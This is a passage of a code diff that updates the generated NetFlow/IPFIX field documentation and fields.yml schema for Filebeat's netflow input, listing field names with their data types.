+*`netflow.reverse_post_vlan_id`*:: + -- -type: date +type: integer -- -*`netflow.message_md5_checksum`*:: +*`netflow.reverse_private_enterprise_number`*:: + -- -type: short +type: long -- -*`netflow.message_scope`*:: +*`netflow.reverse_protocol_identifier`*:: + -- type: short -- -*`netflow.min_export_seconds`*:: +*`netflow.reverse_pseudo_wire_control_word`*:: + -- -type: date +type: long -- -*`netflow.min_flow_start_seconds`*:: +*`netflow.reverse_pseudo_wire_destination_ipv4_address`*:: + -- -type: date +type: ip -- -*`netflow.opaque_octets`*:: +*`netflow.reverse_pseudo_wire_id`*:: + -- -type: short +type: long -- -*`netflow.session_scope`*:: +*`netflow.reverse_pseudo_wire_type`*:: + -- -type: short +type: integer -- -*`netflow.max_flow_end_microseconds`*:: +*`netflow.reverse_relative_error`*:: + -- -type: date +type: double -- -*`netflow.max_flow_end_milliseconds`*:: +*`netflow.reverse_responder_octets`*:: + -- -type: date +type: long -- -*`netflow.max_flow_end_nanoseconds`*:: +*`netflow.reverse_responder_packets`*:: + -- -type: date +type: long -- -*`netflow.min_flow_start_microseconds`*:: +*`netflow.reverse_rfc3550_jitter_microseconds`*:: + -- -type: date +type: long -- -*`netflow.min_flow_start_milliseconds`*:: +*`netflow.reverse_rfc3550_jitter_milliseconds`*:: + -- -type: date +type: long -- -*`netflow.min_flow_start_nanoseconds`*:: +*`netflow.reverse_rfc3550_jitter_nanoseconds`*:: + -- -type: date +type: long -- -*`netflow.collector_certificate`*:: +*`netflow.reverse_rtp_payload_type`*:: + -- type: short -- -*`netflow.exporter_certificate`*:: +*`netflow.reverse_rtp_sequence_number`*:: + -- -type: short +type: integer -- -*`netflow.data_records_reliability`*:: +*`netflow.reverse_sampler_id`*:: + -- -type: boolean +type: short -- -*`netflow.observation_point_type`*:: +*`netflow.reverse_sampler_mode`*:: + -- type: short -- -*`netflow.new_connection_delta_count`*:: +*`netflow.reverse_sampler_name`*:: + -- -type: long +type: keyword -- -*`netflow.connection_sum_duration_seconds`*:: +*`netflow.reverse_sampler_random_interval`*:: + -- type: long -- -*`netflow.connection_transaction_id`*:: +*`netflow.reverse_sampling_algorithm`*:: ++ +-- +type: short + +-- + +*`netflow.reverse_sampling_flow_interval`*:: + -- type: long -- -*`netflow.post_nat_source_ipv6_address`*:: +*`netflow.reverse_sampling_flow_spacing`*:: + -- -type: ip +type: long -- -*`netflow.post_nat_destination_ipv6_address`*:: +*`netflow.reverse_sampling_interval`*:: + -- -type: ip +type: long -- -*`netflow.nat_pool_id`*:: +*`netflow.reverse_sampling_packet_interval`*:: + -- type: long -- -*`netflow.nat_pool_name`*:: +*`netflow.reverse_sampling_packet_space`*:: + -- -type: keyword +type: long -- -*`netflow.anonymization_flags`*:: +*`netflow.reverse_sampling_population`*:: + -- -type: integer +type: long -- -*`netflow.anonymization_technique`*:: +*`netflow.reverse_sampling_probability`*:: + -- -type: integer +type: double -- -*`netflow.information_element_index`*:: +*`netflow.reverse_sampling_size`*:: + -- -type: integer +type: long -- -*`netflow.p2p_technology`*:: +*`netflow.reverse_sampling_time_interval`*:: + -- -type: keyword +type: long -- -*`netflow.tunnel_technology`*:: +*`netflow.reverse_sampling_time_space`*:: + -- -type: keyword +type: long -- -*`netflow.encrypted_technology`*:: +*`netflow.reverse_second_packet_banner`*:: + -- type: keyword -- -*`netflow.bgp_validity_state`*:: +*`netflow.reverse_section_exported_octets`*:: + -- -type: short +type: integer -- -*`netflow.ip_sec_spi`*:: +*`netflow.reverse_section_offset`*:: + -- -type: long +type: integer -- -*`netflow.gre_key`*:: +*`netflow.reverse_selection_sequence_id`*:: + -- type: long -- -*`netflow.nat_type`*:: +*`netflow.reverse_selector_algorithm`*:: + -- -type: short +type: integer -- -*`netflow.initiator_packets`*:: +*`netflow.reverse_selector_id`*:: + -- type: long -- -*`netflow.responder_packets`*:: +*`netflow.reverse_selector_id_total_flows_observed`*:: + -- type: long -- -*`netflow.observation_domain_name`*:: +*`netflow.reverse_selector_id_total_flows_selected`*:: + -- -type: keyword +type: long -- -*`netflow.selection_sequence_id`*:: +*`netflow.reverse_selector_id_total_pkts_observed`*:: + -- type: long -- -*`netflow.selector_id`*:: +*`netflow.reverse_selector_id_total_pkts_selected`*:: + -- type: long -- -*`netflow.information_element_id`*:: +*`netflow.reverse_selector_name`*:: + -- -type: integer +type: keyword -- -*`netflow.selector_algorithm`*:: +*`netflow.reverse_session_scope`*:: + -- -type: integer +type: short -- -*`netflow.sampling_packet_interval`*:: +*`netflow.reverse_small_packet_count`*:: + -- type: long -- -*`netflow.sampling_packet_space`*:: +*`netflow.reverse_source_ipv4_address`*:: + -- -type: long +type: ip + +-- + +*`netflow.reverse_source_ipv4_prefix`*:: ++ +-- +type: ip -- -*`netflow.sampling_time_interval`*:: +*`netflow.reverse_source_ipv4_prefix_length`*:: + -- -type: long +type: short -- -*`netflow.sampling_time_space`*:: +*`netflow.reverse_source_ipv6_address`*:: + -- -type: long +type: ip -- -*`netflow.sampling_size`*:: +*`netflow.reverse_source_ipv6_prefix`*:: + -- -type: long +type: ip -- -*`netflow.sampling_population`*:: +*`netflow.reverse_source_ipv6_prefix_length`*:: + -- -type: long +type: short -- -*`netflow.sampling_probability`*:: +*`netflow.reverse_source_mac_address`*:: + -- -type: double +type: keyword -- -*`netflow.data_link_frame_size`*:: +*`netflow.reverse_source_transport_port`*:: + -- type: integer -- -*`netflow.ip_header_packet_section`*:: +*`netflow.reverse_src_traffic_index`*:: + -- -type: short +type: long -- -*`netflow.ip_payload_packet_section`*:: +*`netflow.reverse_sta_ipv4_address`*:: + -- -type: short +type: ip -- -*`netflow.data_link_frame_section`*:: +*`netflow.reverse_sta_mac_address`*:: + -- -type: short +type: keyword -- -*`netflow.mpls_label_stack_section`*:: +*`netflow.reverse_standard_deviation_interarrival_time`*:: + -- -type: short +type: long -- -*`netflow.mpls_payload_packet_section`*:: +*`netflow.reverse_standard_deviation_payload_length`*:: + -- -type: short +type: integer -- -*`netflow.selector_id_total_pkts_observed`*:: +*`netflow.reverse_system_init_time_milliseconds`*:: + -- type: long -- -*`netflow.selector_id_total_pkts_selected`*:: +*`netflow.reverse_tcp_ack_total_count`*:: + -- type: long -- -*`netflow.absolute_error`*:: +*`netflow.reverse_tcp_acknowledgement_number`*:: + -- -type: double +type: long -- -*`netflow.relative_error`*:: +*`netflow.reverse_tcp_control_bits`*:: + -- -type: double +type: integer -- -*`netflow.observation_time_seconds`*:: +*`netflow.reverse_tcp_destination_port`*:: + -- -type: date +type: integer -- -*`netflow.observation_time_milliseconds`*:: +*`netflow.reverse_tcp_fin_total_count`*:: + -- -type: date +type: long -- -*`netflow.observation_time_microseconds`*:: +*`netflow.reverse_tcp_header_length`*:: + -- -type: date +type: short -- -*`netflow.observation_time_nanoseconds`*:: +*`netflow.reverse_tcp_options`*:: + -- -type: date +type: long -- -*`netflow.digest_hash_value`*:: +*`netflow.reverse_tcp_psh_total_count`*:: + -- type: long -- -*`netflow.hash_ip_payload_offset`*:: +*`netflow.reverse_tcp_rst_total_count`*:: + -- type: long -- -*`netflow.hash_ip_payload_size`*:: +*`netflow.reverse_tcp_sequence_number`*:: + -- type: long -- -*`netflow.hash_output_range_min`*:: +*`netflow.reverse_tcp_source_port`*:: + -- -type: long +type: integer -- -*`netflow.hash_output_range_max`*:: +*`netflow.reverse_tcp_syn_total_count`*:: + -- type: long -- -*`netflow.hash_selected_range_min`*:: +*`netflow.reverse_tcp_urg_total_count`*:: + -- type: long -- -*`netflow.hash_selected_range_max`*:: +*`netflow.reverse_tcp_urgent_pointer`*:: + -- -type: long +type: integer -- -*`netflow.hash_digest_output`*:: +*`netflow.reverse_tcp_window_scale`*:: + -- -type: boolean +type: integer -- -*`netflow.hash_initialiser_value`*:: +*`netflow.reverse_tcp_window_size`*:: + -- -type: long +type: integer -- -*`netflow.selector_name`*:: +*`netflow.reverse_total_length_ipv4`*:: + -- -type: keyword +type: integer -- -*`netflow.upper_ci_limit`*:: +*`netflow.reverse_transport_octet_delta_count`*:: + -- -type: double +type: long -- -*`netflow.lower_ci_limit`*:: +*`netflow.reverse_transport_packet_delta_count`*:: + -- -type: double +type: long -- -*`netflow.confidence_level`*:: +*`netflow.reverse_tunnel_technology`*:: + -- -type: double +type: keyword -- -*`netflow.information_element_data_type`*:: +*`netflow.reverse_udp_destination_port`*:: + -- -type: short +type: integer -- -*`netflow.information_element_description`*:: +*`netflow.reverse_udp_message_length`*:: + -- -type: keyword +type: integer -- -*`netflow.information_element_name`*:: +*`netflow.reverse_udp_source_port`*:: + -- -type: keyword +type: integer -- -*`netflow.information_element_range_begin`*:: +*`netflow.reverse_union_tcp_flags`*:: + -- -type: long +type: short -- -*`netflow.information_element_range_end`*:: +*`netflow.reverse_upper_ci_limit`*:: + -- -type: long +type: double -- -*`netflow.information_element_semantics`*:: +*`netflow.reverse_user_name`*:: ++ +-- +type: keyword + +-- + +*`netflow.reverse_value_distribution_method`*:: + -- type: short -- -*`netflow.information_element_units`*:: +*`netflow.reverse_virtual_station_interface_id`*:: + -- -type: integer +type: keyword -- -*`netflow.private_enterprise_number`*:: +*`netflow.reverse_virtual_station_interface_name`*:: + -- -type: long +type: keyword -- -*`netflow.virtual_station_interface_id`*:: +*`netflow.reverse_virtual_station_name`*:: + -- -type: short +type: keyword -- -*`netflow.virtual_station_interface_name`*:: +*`netflow.reverse_virtual_station_uuid`*:: + -- type: keyword -- -*`netflow.virtual_station_uuid`*:: +*`netflow.reverse_vlan_id`*:: + -- -type: short +type: integer -- -*`netflow.virtual_station_name`*:: +*`netflow.reverse_vr_fname`*:: + -- type: keyword -- -*`netflow.layer2_segment_id`*:: +*`netflow.reverse_wlan_channel_id`*:: + -- -type: long +type: short -- -*`netflow.layer2_octet_delta_count`*:: +*`netflow.reverse_wlan_ssid`*:: + -- -type: long +type: keyword -- -*`netflow.layer2_octet_total_count`*:: +*`netflow.reverse_wtp_mac_address`*:: + -- -type: long +type: keyword -- -*`netflow.ingress_unicast_packet_total_count`*:: +*`netflow.rfc3550_jitter_microseconds`*:: + -- type: long -- -*`netflow.ingress_multicast_packet_total_count`*:: +*`netflow.rfc3550_jitter_milliseconds`*:: + -- type: long -- -*`netflow.ingress_broadcast_packet_total_count`*:: +*`netflow.rfc3550_jitter_nanoseconds`*:: + -- type: long -- -*`netflow.egress_unicast_packet_total_count`*:: +*`netflow.rtp_payload_type`*:: + -- -type: long +type: short -- -*`netflow.egress_broadcast_packet_total_count`*:: +*`netflow.rtp_sequence_number`*:: + -- -type: long +type: integer -- -*`netflow.monitoring_interval_start_milli_seconds`*:: +*`netflow.sampler_id`*:: + -- -type: date +type: short -- -*`netflow.monitoring_interval_end_milli_seconds`*:: +*`netflow.sampler_mode`*:: + -- -type: date +type: short -- -*`netflow.port_range_start`*:: +*`netflow.sampler_name`*:: + -- -type: integer +type: keyword -- -*`netflow.port_range_end`*:: +*`netflow.sampler_random_interval`*:: + -- -type: integer +type: long -- -*`netflow.port_range_step_size`*:: +*`netflow.sampling_algorithm`*:: + -- -type: integer +type: short -- -*`netflow.port_range_num_ports`*:: +*`netflow.sampling_flow_interval`*:: + -- -type: integer +type: long -- -*`netflow.sta_mac_address`*:: +*`netflow.sampling_flow_spacing`*:: + -- -type: keyword +type: long -- -*`netflow.sta_ipv4_address`*:: +*`netflow.sampling_interval`*:: + -- -type: ip +type: long -- -*`netflow.wtp_mac_address`*:: +*`netflow.sampling_packet_interval`*:: + -- -type: keyword +type: long -- -*`netflow.ingress_interface_type`*:: +*`netflow.sampling_packet_space`*:: + -- type: long -- -*`netflow.egress_interface_type`*:: +*`netflow.sampling_population`*:: + -- type: long -- -*`netflow.rtp_sequence_number`*:: +*`netflow.sampling_probability`*:: + -- -type: integer +type: double -- -*`netflow.user_name`*:: +*`netflow.sampling_size`*:: + -- -type: keyword +type: long -- -*`netflow.application_category_name`*:: +*`netflow.sampling_time_interval`*:: + -- -type: keyword +type: long -- -*`netflow.application_sub_category_name`*:: +*`netflow.sampling_time_space`*:: + -- -type: keyword +type: long -- -*`netflow.application_group_name`*:: +*`netflow.second_packet_banner`*:: + -- type: keyword -- -*`netflow.original_flows_present`*:: +*`netflow.section_exported_octets`*:: + -- -type: long +type: integer -- -*`netflow.original_flows_initiated`*:: +*`netflow.section_offset`*:: + -- -type: long +type: integer -- -*`netflow.original_flows_completed`*:: +*`netflow.selection_sequence_id`*:: + -- type: long -- -*`netflow.distinct_count_of_source_ip_address`*:: +*`netflow.selector_algorithm`*:: + -- -type: long +type: integer -- -*`netflow.distinct_count_of_destination_ip_address`*:: +*`netflow.selector_id`*:: + -- type: long -- -*`netflow.distinct_count_of_source_ipv4_address`*:: +*`netflow.selector_id_total_flows_observed`*:: + -- type: long -- -*`netflow.distinct_count_of_destination_ipv4_address`*:: +*`netflow.selector_id_total_flows_selected`*:: + -- type: long -- -*`netflow.distinct_count_of_source_ipv6_address`*:: +*`netflow.selector_id_total_pkts_observed`*:: + -- type: long -- -*`netflow.distinct_count_of_destination_ipv6_address`*:: +*`netflow.selector_id_total_pkts_selected`*:: + -- type: long -- -*`netflow.value_distribution_method`*:: +*`netflow.selector_name`*:: + -- -type: short +type: keyword -- -*`netflow.rfc3550_jitter_milliseconds`*:: +*`netflow.service_name`*:: + -- -type: long +type: keyword -- -*`netflow.rfc3550_jitter_microseconds`*:: +*`netflow.session_scope`*:: + -- -type: long +type: short -- -*`netflow.rfc3550_jitter_nanoseconds`*:: +*`netflow.silk_app_label`*:: + -- -type: long +type: integer -- -*`netflow.dot1q_dei`*:: +*`netflow.small_packet_count`*:: + -- -type: boolean +type: long -- -*`netflow.dot1q_customer_dei`*:: +*`netflow.source_ipv4_address`*:: + -- -type: boolean +type: ip -- -*`netflow.flow_selector_algorithm`*:: +*`netflow.source_ipv4_prefix`*:: + -- -type: integer +type: ip -- -*`netflow.flow_selected_octet_delta_count`*:: +*`netflow.source_ipv4_prefix_length`*:: + -- -type: long +type: short -- -*`netflow.flow_selected_packet_delta_count`*:: +*`netflow.source_ipv6_address`*:: + -- -type: long +type: ip -- -*`netflow.flow_selected_flow_delta_count`*:: +*`netflow.source_ipv6_prefix`*:: + -- -type: long +type: ip -- -*`netflow.selector_id_total_flows_observed`*:: +*`netflow.source_ipv6_prefix_length`*:: + -- -type: long +type: short -- -*`netflow.selector_id_total_flows_selected`*:: +*`netflow.source_mac_address`*:: + -- -type: long +type: keyword -- -*`netflow.sampling_flow_interval`*:: +*`netflow.source_transport_port`*:: + -- -type: long +type: integer -- -*`netflow.sampling_flow_spacing`*:: +*`netflow.source_transport_ports_limit`*:: + -- -type: long +type: integer -- -*`netflow.flow_sampling_time_interval`*:: +*`netflow.src_traffic_index`*:: + -- type: long -- -*`netflow.flow_sampling_time_spacing`*:: +*`netflow.ssl_cert_serial_number`*:: + -- -type: long +type: keyword -- -*`netflow.hash_flow_domain`*:: +*`netflow.ssl_cert_signature`*:: + -- -type: integer +type: keyword -- -*`netflow.transport_octet_delta_count`*:: +*`netflow.ssl_cert_validity_not_after`*:: + -- -type: long +type: keyword -- -*`netflow.transport_packet_delta_count`*:: +*`netflow.ssl_cert_validity_not_before`*:: + -- -type: long +type: keyword -- -*`netflow.original_exporter_ipv4_address`*:: +*`netflow.ssl_cert_version`*:: + -- -type: ip +type: short -- -*`netflow.original_exporter_ipv6_address`*:: +*`netflow.ssl_certificate_hash`*:: + -- -type: ip +type: keyword -- -*`netflow.original_observation_domain_id`*:: +*`netflow.ssl_cipher`*:: + -- -type: long +type: keyword -- -*`netflow.intermediate_process_id`*:: +*`netflow.ssl_client_version`*:: + -- -type: long +type: short -- -*`netflow.ignored_data_record_total_count`*:: +*`netflow.ssl_compression_method`*:: + -- -type: long +type: short -- -*`netflow.data_link_frame_type`*:: +*`netflow.ssl_object_type`*:: + -- -type: integer +type: keyword -- -*`netflow.section_offset`*:: +*`netflow.ssl_object_value`*:: + -- -type: integer +type: keyword -- -*`netflow.section_exported_octets`*:: +*`netflow.ssl_public_key_algorithm`*:: + -- -type: integer +type: keyword -- -*`netflow.dot1q_service_instance_tag`*:: +*`netflow.ssl_public_key_length`*:: + -- -type: short +type: keyword -- -*`netflow.dot1q_service_instance_id`*:: +*`netflow.ssl_server_cipher`*:: + -- type: long -- -*`netflow.dot1q_service_instance_priority`*:: +*`netflow.ssl_server_name`*:: + -- -type: short +type: keyword -- -*`netflow.dot1q_customer_source_mac_address`*:: +*`netflow.sta_ipv4_address`*:: + -- -type: keyword +type: ip -- -*`netflow.dot1q_customer_destination_mac_address`*:: +*`netflow.sta_mac_address`*:: + -- type: keyword -- -*`netflow.post_layer2_octet_delta_count`*:: +*`netflow.standard_deviation_interarrival_time`*:: + -- type: long -- -*`netflow.post_mcast_layer2_octet_delta_count`*:: +*`netflow.standard_deviation_payload_length`*:: + -- -type: long +type: short -- -*`netflow.post_layer2_octet_total_count`*:: +*`netflow.system_init_time_milliseconds`*:: + -- -type: long +type: date -- -*`netflow.post_mcast_layer2_octet_total_count`*:: +*`netflow.tcp_ack_total_count`*:: + -- type: long -- -*`netflow.minimum_layer2_total_length`*:: +*`netflow.tcp_acknowledgement_number`*:: + -- type: long -- -*`netflow.maximum_layer2_total_length`*:: +*`netflow.tcp_control_bits`*:: + -- -type: long +type: integer -- -*`netflow.dropped_layer2_octet_delta_count`*:: +*`netflow.tcp_destination_port`*:: + -- -type: long +type: integer -- -*`netflow.dropped_layer2_octet_total_count`*:: +*`netflow.tcp_fin_total_count`*:: + -- type: long -- -*`netflow.ignored_layer2_octet_total_count`*:: +*`netflow.tcp_header_length`*:: + -- -type: long +type: short -- -*`netflow.not_sent_layer2_octet_total_count`*:: +*`netflow.tcp_options`*:: + -- type: long -- -*`netflow.layer2_octet_delta_sum_of_squares`*:: +*`netflow.tcp_psh_total_count`*:: + -- type: long -- -*`netflow.layer2_octet_total_sum_of_squares`*:: +*`netflow.tcp_rst_total_count`*:: + -- type: long -- -*`netflow.layer2_frame_delta_count`*:: +*`netflow.tcp_sequence_number`*:: + -- type: long -- -*`netflow.layer2_frame_total_count`*:: +*`netflow.tcp_source_port`*:: + -- -type: long +type: integer -- -*`netflow.pseudo_wire_destination_ipv4_address`*:: +*`netflow.tcp_syn_total_count`*:: + -- -type: ip +type: long -- -*`netflow.ignored_layer2_frame_total_count`*:: +*`netflow.tcp_urg_total_count`*:: + -- type: long -- -*`netflow.mib_object_value_integer`*:: +*`netflow.tcp_urgent_pointer`*:: + -- type: integer -- -*`netflow.mib_object_value_octet_string`*:: +*`netflow.tcp_window_scale`*:: + -- -type: short +type: integer -- -*`netflow.mib_object_value_oid`*:: +*`netflow.tcp_window_size`*:: + -- -type: short +type: integer -- -*`netflow.mib_object_value_bits`*:: +*`netflow.template_id`*:: + -- -type: short +type: integer -- -*`netflow.mib_object_value_ip_address`*:: +*`netflow.tftp_filename`*:: + -- -type: ip +type: keyword -- -*`netflow.mib_object_value_counter`*:: +*`netflow.tftp_mode`*:: + -- -type: long +type: keyword -- -*`netflow.mib_object_value_gauge`*:: +*`netflow.timestamp`*:: + -- type: long -- -*`netflow.mib_object_value_time_ticks`*:: +*`netflow.timestamp_absolute_monitoring-interval`*:: + -- type: long -- -*`netflow.mib_object_value_unsigned`*:: +*`netflow.total_length_ipv4`*:: + -- -type: long +type: integer -- -*`netflow.mib_object_identifier`*:: +*`netflow.traffic_type`*:: + -- type: short -- -*`netflow.mib_sub_identifier`*:: +*`netflow.transport_octet_delta_count`*:: + -- type: long -- -*`netflow.mib_index_indicator`*:: +*`netflow.transport_packet_delta_count`*:: + -- type: long -- -*`netflow.mib_capture_time_semantics`*:: +*`netflow.tunnel_technology`*:: + -- -type: short +type: keyword -- -*`netflow.mib_context_engine_id`*:: +*`netflow.udp_destination_port`*:: + -- -type: short +type: integer -- -*`netflow.mib_context_name`*:: +*`netflow.udp_message_length`*:: + -- -type: keyword +type: integer -- -*`netflow.mib_object_name`*:: +*`netflow.udp_source_port`*:: + -- -type: keyword +type: integer -- -*`netflow.mib_object_description`*:: +*`netflow.union_tcp_flags`*:: + -- -type: keyword +type: short -- -*`netflow.mib_object_syntax`*:: +*`netflow.upper_ci_limit`*:: + -- -type: keyword +type: double -- -*`netflow.mib_module_name`*:: +*`netflow.user_name`*:: + -- type: keyword -- -*`netflow.mobile_imsi`*:: +*`netflow.username`*:: + -- type: keyword -- -*`netflow.mobile_msisdn`*:: +*`netflow.value_distribution_method`*:: + -- -type: keyword +type: short -- -*`netflow.http_status_code`*:: +*`netflow.viptela_vpn_id`*:: + -- -type: integer +type: long -- -*`netflow.source_transport_ports_limit`*:: +*`netflow.virtual_station_interface_id`*:: + -- -type: integer +type: short -- -*`netflow.http_request_method`*:: +*`netflow.virtual_station_interface_name`*:: + -- type: keyword -- -*`netflow.http_request_host`*:: +*`netflow.virtual_station_name`*:: + -- type: keyword -- -*`netflow.http_request_target`*:: +*`netflow.virtual_station_uuid`*:: + -- -type: keyword +type: short -- -*`netflow.http_message_version`*:: +*`netflow.vlan_id`*:: + -- -type: keyword +type: integer -- -*`netflow.nat_instance_id`*:: +*`netflow.vmware_egress_interface_attr`*:: + -- -type: long +type: integer -- -*`netflow.internal_address_realm`*:: +*`netflow.vmware_ingress_interface_attr`*:: + -- -type: short +type: integer -- -*`netflow.external_address_realm`*:: +*`netflow.vmware_tenant_dest_ipv4`*:: + -- -type: short +type: ip -- -*`netflow.nat_quota_exceeded_event`*:: +*`netflow.vmware_tenant_dest_ipv6`*:: + -- -type: long +type: ip -- -*`netflow.nat_threshold_event`*:: +*`netflow.vmware_tenant_dest_port`*:: + -- -type: long +type: integer -- -*`netflow.http_user_agent`*:: +*`netflow.vmware_tenant_protocol`*:: + -- -type: keyword +type: short -- -*`netflow.http_content_type`*:: +*`netflow.vmware_tenant_source_ipv4`*:: + -- -type: keyword +type: ip -- -*`netflow.http_reason_phrase`*:: +*`netflow.vmware_tenant_source_ipv6`*:: + -- -type: keyword +type: ip -- -*`netflow.max_session_entries`*:: +*`netflow.vmware_tenant_source_port`*:: + -- -type: long +type: integer -- -*`netflow.max_bib_entries`*:: +*`netflow.vmware_vxlan_export_role`*:: + -- -type: long +type: short -- -*`netflow.max_entries_per_user`*:: +*`netflow.vpn_identifier`*:: + -- -type: long +type: short -- -*`netflow.max_subscribers`*:: +*`netflow.vr_fname`*:: + -- -type: long +type: keyword -- -*`netflow.max_fragments_pending_reassembly`*:: +*`netflow.waasoptimization_segment`*:: + -- -type: long +type: short -- -*`netflow.address_pool_high_threshold`*:: +*`netflow.wlan_channel_id`*:: + -- -type: long +type: short -- -*`netflow.address_pool_low_threshold`*:: +*`netflow.wlan_ssid`*:: + -- -type: long +type: keyword -- -*`netflow.address_port_mapping_high_threshold`*:: +*`netflow.wtp_mac_address`*:: + -- -type: long +type: keyword -- -*`netflow.address_port_mapping_low_threshold`*:: +*`netflow.xlate_destination_address_ip_v4`*:: + -- -type: long +type: ip -- -*`netflow.address_port_mapping_per_user_high_threshold`*:: +*`netflow.xlate_destination_port`*:: + -- -type: long +type: integer -- -*`netflow.global_address_mapping_high_threshold`*:: +*`netflow.xlate_source_address_ip_v4`*:: + -- -type: long +type: ip -- -*`netflow.vpn_identifier`*:: +*`netflow.xlate_source_port`*:: + -- -type: short +type: integer -- diff --git a/x-pack/filebeat/input/netflow/_meta/fields.header.yml b/x-pack/filebeat/input/netflow/_meta/fields.header.yml index 60e585ec2dfa..2b1b2aa6b8c2 100644 --- a/x-pack/filebeat/input/netflow/_meta/fields.header.yml +++ b/x-pack/filebeat/input/netflow/_meta/fields.header.yml @@ -5,6 +5,7 @@ fields: - name: netflow type: group + default_field: false description: > Fields from NetFlow and IPFIX. fields: diff --git a/x-pack/filebeat/input/netflow/_meta/fields.yml b/x-pack/filebeat/input/netflow/_meta/fields.yml index f5a4c0823d58..e9e0755d3757 100644 --- a/x-pack/filebeat/input/netflow/_meta/fields.yml +++ b/x-pack/filebeat/input/netflow/_meta/fields.yml @@ -1,3 +1,6 @@ +######################################## +# This file is generated. Do not modify. +######################################## - key: netflow title: "NetFlow" description: > @@ -5,6 +8,7 @@ fields: - name: netflow type: group + default_field: false description: > Fields from NetFlow and IPFIX. fields: @@ -43,1341 +47,3951 @@ description: > NetFlow version used. - - name: octet_delta_count + - name: absolute_error + type: double + + - name: address_pool_high_threshold type: long - - name: packet_delta_count + - name: address_pool_low_threshold type: long - - name: delta_flow_count + - name: address_port_mapping_high_threshold type: long - - name: protocol_identifier - type: short + - name: address_port_mapping_low_threshold + type: long - - name: ip_class_of_service - type: short + - name: address_port_mapping_per_user_high_threshold + type: long - - name: tcp_control_bits + - name: afc_protocol type: integer - - name: source_transport_port - type: integer + - name: afc_protocol_name + type: keyword - - name: source_ipv4_address - type: ip + - name: anonymization_flags + type: integer - - name: source_ipv4_prefix_length - type: short + - name: anonymization_technique + type: integer - - name: ingress_interface + - name: application_business-relevance type: long - - name: destination_transport_port - type: integer + - name: application_category_name + type: keyword - - name: destination_ipv4_address - type: ip + - name: application_description + type: keyword - - name: destination_ipv4_prefix_length - type: short + - name: application_group_name + type: keyword - - name: egress_interface - type: long + - name: application_http_uri_statistics + type: short - - name: ip_next_hop_ipv4_address - type: ip + - name: application_http_user-agent + type: short - - name: bgp_source_as_number - type: long + - name: application_id + type: short - - name: bgp_destination_as_number - type: long + - name: application_name + type: keyword - - name: bgp_next_hop_ipv4_address - type: ip + - name: application_sub_category_name + type: keyword - - name: post_mcast_packet_delta_count + - name: application_traffic-class type: long - - name: post_mcast_octet_delta_count + - name: art_client_network_time_maximum type: long - - name: flow_end_sys_up_time + - name: art_client_network_time_minimum type: long - - name: flow_start_sys_up_time + - name: art_client_network_time_sum type: long - - name: post_octet_delta_count + - name: art_clientpackets type: long - - name: post_packet_delta_count + - name: art_count_late_responses type: long - - name: minimum_ip_total_length + - name: art_count_new_connections type: long - - name: maximum_ip_total_length + - name: art_count_responses type: long - - name: source_ipv6_address - type: ip - - - name: destination_ipv6_address - type: ip - - - name: source_ipv6_prefix_length - type: short + - name: art_count_responses_histogram_bucket1 + type: long - - name: destination_ipv6_prefix_length - type: short + - name: art_count_responses_histogram_bucket2 + type: long - - name: flow_label_ipv6 + - name: art_count_responses_histogram_bucket3 type: long - - name: icmp_type_code_ipv4 - type: integer + - name: art_count_responses_histogram_bucket4 + type: long - - name: igmp_type - type: short + - name: art_count_responses_histogram_bucket5 + type: long - - name: sampling_interval + - name: art_count_responses_histogram_bucket6 type: long - - name: sampling_algorithm - type: short + - name: art_count_responses_histogram_bucket7 + type: long - - name: flow_active_timeout - type: integer + - name: art_count_retransmissions + type: long - - name: flow_idle_timeout - type: integer + - name: art_count_transactions + type: long - - name: engine_type - type: short + - name: art_network_time_maximum + type: long - - name: engine_id - type: short + - name: art_network_time_minimum + type: long - - name: exported_octet_total_count + - name: art_network_time_sum type: long - - name: exported_message_total_count + - name: art_response_time_maximum type: long - - name: exported_flow_record_total_count + - name: art_response_time_minimum type: long - - name: ipv4_router_sc - type: ip + - name: art_response_time_sum + type: long - - name: source_ipv4_prefix - type: ip + - name: art_server_network_time_maximum + type: long - - name: destination_ipv4_prefix - type: ip + - name: art_server_network_time_minimum + type: long - - name: mpls_top_label_type - type: short + - name: art_server_network_time_sum + type: long - - name: mpls_top_label_ipv4_address - type: ip + - name: art_server_response_time_maximum + type: long - - name: sampler_id - type: short + - name: art_server_response_time_minimum + type: long - - name: sampler_mode - type: short + - name: art_server_response_time_sum + type: long - - name: sampler_random_interval + - name: art_serverpackets type: long - - name: class_id + - name: art_total_response_time_maximum type: long - - name: minimum_ttl - type: short + - name: art_total_response_time_minimum + type: long - - name: maximum_ttl - type: short + - name: art_total_response_time_sum + type: long - - name: fragment_identification + - name: art_total_transaction_time_maximum type: long - - name: post_ip_class_of_service - type: short + - name: art_total_transaction_time_minimum + type: long - - name: source_mac_address - type: keyword + - name: art_total_transaction_time_sum + type: long - - name: post_destination_mac_address - type: keyword + - name: assembled_fragment_count + type: long - - name: vlan_id - type: integer + - name: audit_counter + type: long - - name: post_vlan_id - type: integer + - name: average_interarrival_time + type: long - - name: ip_version - type: short + - name: bgp_destination_as_number + type: long - - name: flow_direction - type: short + - name: bgp_next_adjacent_as_number + type: long - - name: ip_next_hop_ipv6_address + - name: bgp_next_hop_ipv4_address type: ip - name: bgp_next_hop_ipv6_address type: ip - - name: ipv6_extension_headers + - name: bgp_prev_adjacent_as_number type: long - - name: mpls_top_label_stack_section - type: short + - name: bgp_source_as_number + type: long - - name: mpls_label_stack_section2 + - name: bgp_validity_state type: short - - name: mpls_label_stack_section3 + - name: biflow_direction type: short - - name: mpls_label_stack_section4 - type: short + - name: bind_ipv4_address + type: ip - - name: mpls_label_stack_section5 - type: short + - name: bind_transport_port + type: integer - - name: mpls_label_stack_section6 - type: short + - name: class_id + type: long - - name: mpls_label_stack_section7 - type: short + - name: class_name + type: keyword - - name: mpls_label_stack_section8 + - name: classification_engine_id type: short - - name: mpls_label_stack_section9 - type: short + - name: collection_time_milliseconds + type: date - - name: mpls_label_stack_section10 + - name: collector_certificate type: short - - name: destination_mac_address - type: keyword + - name: collector_ipv4_address + type: ip - - name: post_source_mac_address - type: keyword + - name: collector_ipv6_address + type: ip - - name: interface_name - type: keyword + - name: collector_transport_port + type: integer - - name: interface_description - type: keyword + - name: common_properties_id + type: long - - name: sampler_name - type: keyword + - name: confidence_level + type: double - - name: octet_total_count + - name: conn_ipv4_address + type: ip + + - name: conn_transport_port + type: integer + + - name: connection_sum_duration_seconds type: long - - name: packet_total_count + - name: connection_transaction_id type: long - - name: flags_and_sampler_id + - name: conntrack_id type: long - - name: fragment_offset - type: integer + - name: data_byte_count + type: long - - name: forwarding_status + - name: data_link_frame_section type: short - 